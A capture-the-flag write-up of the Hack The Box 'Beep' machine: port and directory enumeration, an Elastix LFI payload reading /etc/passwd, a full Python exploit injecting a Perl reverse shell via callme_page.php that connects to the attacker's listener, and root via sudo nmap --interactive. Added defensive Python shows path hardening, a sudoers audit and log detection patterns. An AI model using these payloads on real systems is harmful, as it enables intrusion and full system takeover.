Disclaimer

The hosts attacked in this article are legally authorized targets. The tools and methods used here are for learning and exchange only. Do not use the tools or the attack ideas from this article for any illegal purpose. I take no responsibility for any consequences, misuse or damage arising from it.

Service detection

```
┌──(root💀kali)-[~/HTB/Beep]
└─# nmap -sV -Pn 10.10.10.7 -p-
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-09 01:07 EST
Nmap scan report for 10.10.10.7
Host is up (0.33s latency).
Not shown: 65519 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
25/tcp    open  smtp       Postfix smtpd
80/tcp    open  http       Apache httpd 2.2.3
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
111/tcp   open  rpcbind    2 (RPC #100000)
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
443/tcp   open  ssl/https?
879/tcp   open  status     1 (RPC #100024)
993/tcp   open  ssl/imap   Cyrus imapd
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
4190/tcp  open  sieve      Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp  open  upnotifyp?
4559/tcp  open  hylafax    HylaFAX 4.3.10
5038/tcp  open  asterisk   Asterisk Call Manager 1.1
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1565.01 seconds
```

In a real engagement, more open ports usually mean more potential vulnerabilities. On a lab target like this, however, a large number of services more likely means a large number of rabbit holes, so we have to be careful about what we choose to enumerate.

Use gobuster to brute-force the web directories on port 80 first; the -k flag is needed to skip TLS certificate verification.

Directory brute-forcing

```
┌──(root💀kali)-[~/dirsearch]
└─# gobuster dir -w /usr/share/wordlists/web-content/common.txt -k -u https://10.10.10.7/ --wildcard
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://10.10.10.7/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/web-content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/12/09 02:53:35 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 282]
/.htaccess            (Status: 403) [Size: 287]
/.htpasswd            (Status: 403) [Size: 287]
/admin                (Status: 301) [Size: 309] [--> https://10.10.10.7/admin/]
/cgi-bin/             (Status: 403) [Size: 286]
Progress: 1041/4686 (22.22%)
[ERROR] 2021/12/09 02:56:30 [!] Get "https://10.10.10.7/certs": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
/configs              (Status: 301) [Size: 311] [--> https://10.10.10.7/configs/]
/favicon.ico          (Status: 200) [Size: 894]
/help                 (Status: 301) [Size: 308] [--> https://10.10.10.7/help/]
/images               (Status: 301) [Size: 310] [--> https://10.10.10.7/images/]
/index.php            (Status: 200) [Size: 1785]
/lang                 (Status: 301) [Size: 308] [--> https://10.10.10.7/lang/]
/libs                 (Status: 301) [Size: 308] [--> https://10.10.10.7/libs/]
/mail                 (Status: 301) [Size: 308] [--> https://10.10.10.7/mail/]
/modules              (Status: 301) [Size: 311] [--> https://10.10.10.7/modules/]
/panel                (Status: 301) [Size: 309] [--> https://10.10.10.7/panel/]
/robots.txt           (Status: 200) [Size: 28]
/static               (Status: 301) [Size: 310] [--> https://10.10.10.7/static/]
Progress: 3959/4686 (84.49%)
[ERROR] 2021/12/09 03:02:55 [!] Get "https://10.10.10.7/status": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 3986/4686 (85.06%)
[ERROR] 2021/12/09 03:03:04 [!] Get "https://10.10.10.7/style_captcha": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 4036/4686 (86.13%)
[ERROR] 2021/12/09 03:03:19 [!] Get "https://10.10.10.7/swfobject.js": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
/themes               (Status: 301) [Size: 310] [--> https://10.10.10.7/themes/]
/var                  (Status: 301) [Size: 307] [--> https://10.10.10.7/var/]
```

The web service on port 80 runs a CMS called Elastix, which has a known LFI vulnerability; see the public exploit for it.

The PoC can be verified as follows:

```
https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/passwd%00&module=Accounts&action
```

The page prints:

```
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
distcache:x:94:94:Distcache:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash
dbus:x:81:81:System message bus:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
mailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
asterisk:x:100:101:Asterisk VoIP PBX:/var/lib/asterisk:/bin/bash
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
spamfilter:x:500:500::/home/spamfilter:/bin/bash
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
fanis:x:501:501::/home/fanis:/bin/bash
Sorry! Attempt to access restricted file.
```

OK, the vulnerability is confirmed. Users of interest: asterisk, spamfilter, fanis.

user.txt can be read with this payload:

```
https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//home/fanis/user.txt%00&module=Accounts&action
```

An LFI usually has to be combined with an upload vulnerability or a file-parsing vulnerability to get a webshell, but I did not find an upload entry point, and I could not locate Apache's access_log file either.
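To see what went wrong in graph.php from the defender's side, here is an added Python example (it is not Elastix or vTiger code) that contrasts the defective "glue the parameter onto a path" pattern with a hardened resolver. The ".lang.php" suffix, the directory layout and the function names are assumptions made for the demonstration; the two payloads are the URL-decoded current_language values used above. The unsafe resolver emulates the NUL truncation that made %00 work, and the safe one rejects NUL bytes, allowlists the value's shape and verifies the canonical path stays inside the language directory.

```python
import os
import re
import tempfile
from pathlib import Path

# Added example (not Elastix/vTiger code). The ".lang.php" suffix, the
# directory layout and the function names are assumptions for illustration.

LANG_RE = re.compile(r"[a-z]{2}(?:_[A-Z]{2})?")


def resolve_unsafe(base_dir: str, language: str) -> str:
    """The defective pattern: the request parameter is glued onto a path and
    used as-is. The C runtime under the old interpreter stops at the first NUL,
    so the intended suffix is dropped; that is what the %00 in the PoC did."""
    raw = os.path.join(base_dir, language + ".lang.php")
    truncated = raw.split("\x00", 1)[0]  # emulate C-string truncation at NUL
    return os.path.normpath(truncated)


def resolve_safe(base_dir: str, language: str) -> str:
    """Hardened resolver: refuse NUL bytes, allowlist the value's shape,
    canonicalise, and confirm the file is a direct child of base_dir."""
    if "\x00" in language:
        raise ValueError("NUL byte in language parameter")
    if not LANG_RE.fullmatch(language):
        raise ValueError("language must look like 'en' or 'en_US'")
    base = Path(base_dir).resolve()
    candidate = (base / f"{language}.lang.php").resolve()
    if candidate.parent != base:  # catches symlinks and any residual traversal
        raise ValueError("resolved path escapes the language directory")
    if not candidate.is_file():
        raise FileNotFoundError(str(candidate))
    return str(candidate)


def demo() -> dict:
    """Run both resolvers over the page's two payloads and a legitimate value.
    Returns a dict so the outcome can be checked programmatically."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        lang_dir = os.path.join(tmp, "vtigercrm", "include", "language")
        os.makedirs(lang_dir)
        legit = os.path.join(lang_dir, "en_US.lang.php")
        with open(legit, "w", encoding="utf-8") as fh:
            fh.write("<?php // constructed sample language file\n")

        # URL-decoded forms of the current_language values used on the page
        payloads = {
            "passwd": "../../../../../../../..//etc/passwd\x00",
            "user_txt": "../../../../../../../..//home/fanis/user.txt\x00",
        }
        for name, value in payloads.items():
            results[f"unsafe_{name}"] = resolve_unsafe(lang_dir, value)
            try:
                resolve_safe(lang_dir, value)
                results[f"safe_{name}"] = "accepted"
            except ValueError as exc:
                results[f"safe_{name}"] = f"rejected: {exc}"

        results["unsafe_legit"] = resolve_unsafe(lang_dir, "en_US") == legit
        results["safe_legit"] = resolve_safe(lang_dir, "en_US") == os.path.realpath(legit)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:16} {value}")
```

The order of checks matters: the NUL test comes first because Path.resolve() itself refuses embedded NUL bytes, and the allowlist removes any need to reason about encodings of "../". The parent comparison after resolve() is the backstop for symlinks planted inside the language directory.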

Initial shell

I then kept searching for exploits against this CMS, found another one giving RCE, and found the exploit script on GitHub.

To run this script locally, these two lines are needed:

```
ctx.set_ciphers('HIGH:!DH:!aNULL')
ctx.set_ciphers('DEFAULT@SECLEVEL=1')
```

Otherwise an SSL error is raised, because the target only speaks TLSv1 with ciphers that a modern OpenSSL rejects at its default security level.

The full exploit is as follows:

```
# Exploit modified by infosecjunky
# https://infosecjunky.com
# Python 2 script (urllib2)

import urllib2
import ssl

rhost = "10.10.10.7"
lhost = "10.10.14.16"     # listener address (see the nc session below)
lport = 4455              # listener port
extension = "EXTENSION"   # placeholder: the Asterisk extension to dial, not given in this post

# The target only speaks TLSv1 with weak ciphers; relax the client side accordingly
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
ctx.set_ciphers('HIGH:!DH:!aNULL')
ctx.set_ciphers('DEFAULT@SECLEVEL=1')

# Reverse shell payload, injected through callme_page.php into the Asterisk Manager action
url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'

urllib2.urlopen(url, context=ctx)
```

Catch the shell on the listener:

```
└─# nc -lnvp 4455
listening on [any] 4455 ...
connect to [10.10.14.16] from (UNKNOWN) [10.10.10.7] 49229
id
uid=100(asterisk) gid=101(asterisk)
whoami
asterisk
```

Privilege escalation

Upgrade to a TTY with Python:

```
python -c 'import pty; pty.spawn("/bin/sh")'
```

Check sudo privileges:

```
sh-3.2$ sudo -l
sudo -l
Matching Defaults entries for asterisk on this host:
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR
    LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE
    LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY
    LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE
    LINGUAS _XKB_CHARSET XAUTHORITY"

User asterisk may run the following commands on this host:
    (root) NOPASSWD: /sbin/shutdown
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/bin/yum
    (root) NOPASSWD: /bin/touch
    (root) NOPASSWD: /bin/chmod
    (root) NOPASSWD: /bin/chown
    (root) NOPASSWD: /sbin/service
    (root) NOPASSWD: /sbin/init
    (root) NOPASSWD: /usr/sbin/postmap
    (root) NOPASSWD: /usr/sbin/postfix
    (root) NOPASSWD: /usr/sbin/saslpasswd2
    (root) NOPASSWD: /usr/sbin/hardware_detector
    (root) NOPASSWD: /sbin/chkconfig
    (root) NOPASSWD: /usr/sbin/elastix-helper
```
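A sudoers list this long is the kind of thing a hardening review should catch before an attacker does. The following is an added Python example (not from this post or from Elastix) that parses the plain-text output of `sudo -l` and reports every rule that runs as root without a password. The sample text is the rule section shown above, and the notes table is a small constructed set describing what the flagged binaries do; the function names are assumptions.

```python
import re

# Added example, not from the page or from Elastix. It parses the plain-text
# output of `sudo -l` and reports every rule that runs as root without a
# password. The notes table is a small constructed set, not a full catalogue.

# Constructed sample: the rule section of the sudo -l output shown above.
SAMPLE_SUDO_L = """\
Matching Defaults entries for asterisk on this host:
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR"

User asterisk may run the following commands on this host:
    (root) NOPASSWD: /sbin/shutdown
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/bin/yum
    (root) NOPASSWD: /bin/touch
    (root) NOPASSWD: /bin/chmod
    (root) NOPASSWD: /bin/chown
    (root) NOPASSWD: /sbin/service
    (root) NOPASSWD: /sbin/init
    (root) NOPASSWD: /usr/sbin/postmap
    (root) NOPASSWD: /usr/sbin/postfix
    (root) NOPASSWD: /usr/sbin/saslpasswd2
    (root) NOPASSWD: /usr/sbin/hardware_detector
    (root) NOPASSWD: /sbin/chkconfig
    (root) NOPASSWD: /usr/sbin/elastix-helper
"""

# "(runas) TAG: TAG: /path/to/cmd args"
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>/\S+.*?)\s*$"
)

# Why a given binary deserves attention when it runs as root without a password.
NOTES = {
    "nmap": "old interactive mode spawns a shell (the escalation shown in this post)",
    "yum": "package manager: installs and runs arbitrary packages as root",
    "chmod": "changes the permissions of any file as root",
    "chown": "changes the ownership of any file as root",
    "touch": "creates or re-timestamps any file as root",
}


def parse_sudo_l(text):
    """Return a list of {runas, tags, cmd} dicts for the rule lines only."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if m:
            rules.append({
                "runas": m.group("runas").strip(),
                "tags": re.findall(r"[A-Z]+", m.group("tags")),
                "cmd": m.group("cmd"),
            })
    return rules


def audit(rules):
    """Flag rules that run as root with NOPASSWD; returns (cmd, severity, note)."""
    findings = []
    for r in rules:
        if r["runas"] != "root" or "NOPASSWD" not in r["tags"]:
            continue
        name = r["cmd"].split("/")[-1].split()[0]
        if name in NOTES:
            findings.append((r["cmd"], "high", NOTES[name]))
        else:
            findings.append((r["cmd"], "review",
                             "root NOPASSWD rule; confirm it cannot run arbitrary "
                             "commands or write arbitrary files"))
    return findings


if __name__ == "__main__":
    for cmd, severity, note in audit(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"{severity:7} {cmd:32} {note}")
```

The remediation this points at is the usual one: drop NOPASSWD, restrict each rule to the exact arguments the PBX needs, and remove entries such as nmap that have nothing to do with running a phone system.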

Use nmap to escalate to root:

```
sh-3.2$ sudo /usr/bin/nmap --interactive
sudo /usr/bin/nmap --interactive

Starting nmap V. 4.11 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
sh-3.2# id
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
sh-3.2# whoami
whoami
root
sh-3.2#
```

Conclusion

A very simple target machine; only the initial shell took some time. After a long search, the access_log turned out to be in this location (found as root):

```
sh-3.2# find / -name access_log
find / -name access_log
/var/log/httpd/access_log
```

However, the web account has no read permission on it:

```
sh-3.2$ id
id
uid=100(asterisk) gid=101(asterisk)
sh-3.2$ cat /var/log/httpd/access_log
cat /var/log/httpd/access_log
cat: /var/log/httpd/access_log: Permission denied
```

Watch out for these rabbit holes.
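The access log that was out of reach here is also where every request made in this writeup would have been recorded, which makes it the natural place to detect them. The following is an added Python example (not from this post) that scans Apache combined-format log lines for the traffic patterns seen above: NUL bytes, "../" traversal, CR/LF injection, and an "Application: system" line pushed through callme_page.php. The log lines are constructed to resemble this engagement; the client address, timestamps, sizes, user agents and the EXT extension placeholder are made up, and the function names are assumptions.

```python
import re
from urllib.parse import unquote

# Added example, not from the page. Log lines are constructed in Apache
# combined format to resemble the requests made in this writeup; client
# address, timestamps, sizes and user agents are made up.
SAMPLE_ACCESS_LOG = """\
10.10.14.16 - - [09/Dec/2021:02:53:40 -0500] "GET /index.php HTTP/1.1" 200 1785 "-" "gobuster/3.1.0"
10.10.14.16 - - [09/Dec/2021:02:53:41 -0500] "GET /admin/ HTTP/1.1" 200 2210 "-" "gobuster/3.1.0"
10.10.14.16 - - [09/Dec/2021:03:10:02 -0500] "GET /vtigercrm/graph.php?current_language=../../../../../../../..//etc/passwd%00&module=Accounts&action HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.10.14.16 - - [09/Dec/2021:03:12:15 -0500] "GET /vtigercrm/graph.php?current_language=../../../../../../../..//home/fanis/user.txt%00&module=Accounts&action HTTP/1.1" 200 1100 "-" "Mozilla/5.0"
10.10.14.16 - - [09/Dec/2021:03:30:07 -0500] "GET /recordings/misc/callme_page.php?action=c&callmenum=EXT@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20... HTTP/1.1" 200 0 "-" "Python-urllib/2.7"
"""

# Apache combined log format: ip ident user [time] "method target proto" status size "referer" "agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def inspect_request(target):
    """Return the list of reasons a request target looks hostile (empty if clean)."""
    decoded = unquote(unquote(target))  # decode twice to catch %25-encoded payloads
    path = decoded.split("?", 1)[0]
    reasons = []
    if "\x00" in decoded:
        reasons.append("NUL byte (%00) in request")
    if "../" in decoded or "..\\" in decoded:
        reasons.append("path traversal sequence")
    if "\r" in decoded or "\n" in decoded:
        reasons.append("CR/LF injection in request")
    if path.endswith("callme_page.php") and re.search(r"Application:\s*system", decoded, re.I):
        reasons.append("Asterisk Manager 'Application: system' injected via callme_page.php")
    return reasons


def scan_access_log(text):
    """Parse each line and collect hits as dicts with line number, client, status and reasons."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = LINE_RE.match(line)
        if not m:
            continue  # malformed or truncated line; skip rather than crash
        reasons = inspect_request(m.group("target"))
        if reasons:
            hits.append({
                "line": lineno,
                "ip": m.group("ip"),
                "status": int(m.group("status")),
                "path": unquote(m.group("target")).split("?", 1)[0],
                "reasons": reasons,
            })
    return hits


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"line {hit['line']}: {hit['ip']} -> {hit['path']} ({hit['status']}): "
              + "; ".join(hit["reasons"]))
```

A 200 status on a flagged line is the signal worth paging on, since it means the traversal or injection was served rather than refused. The strict file permissions that stopped the asterisk user from reading this log are the right default; the detection belongs on a log collector that receives a copy, not on the web host itself.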